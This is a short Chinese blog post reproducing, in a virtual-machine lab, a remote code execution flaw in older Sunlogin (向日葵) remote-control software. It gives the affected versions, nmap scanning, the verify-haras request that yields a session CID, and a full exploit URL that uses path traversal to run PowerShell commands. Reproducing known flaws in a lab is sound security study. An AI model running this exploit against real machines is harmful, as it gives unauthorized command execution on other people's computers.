向日葵RCE复现

本次实验在虚拟机上安装向日葵，用本机nmap进行扫描虚拟机上的向日葵版本要符合：向日葵个人版for Windows <= 11.0.0.33向日葵简约版<= V1.0.1.43315（2021.12）在虚拟机上打开向日葵然后在本机上用nmap扫描(扫描的为虚拟机ip)然后用浏览器一个个的尝试访问ip+端口号+cgi-bin/rpc?action=verify-haras(获取sessi

雲小

7090人浏览 · 2022-02-28 20:59:48

雲小 · 2022-02-28 20:59:48 发布

本次实验在虚拟机上安装向日葵，用本机nmap进行扫描

虚拟机上的向日葵版本要符合：

向日葵个人版 for Windows <= 11.0.0.33
向日葵简约版 <= V1.0.1.43315（2021.12）

在虚拟机上打开向日葵

然后在本机上用nmap扫描(扫描的为虚拟机ip)

然后用浏览器一个个的尝试访问

ip+端口号+cgi-bin/rpc?action=verify-haras(获取session值CID)

有了CID然后进行添加到payload和cookie发送

http://虚拟机ip：端口（这里是192.168.118.135:49555）/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20ipconfig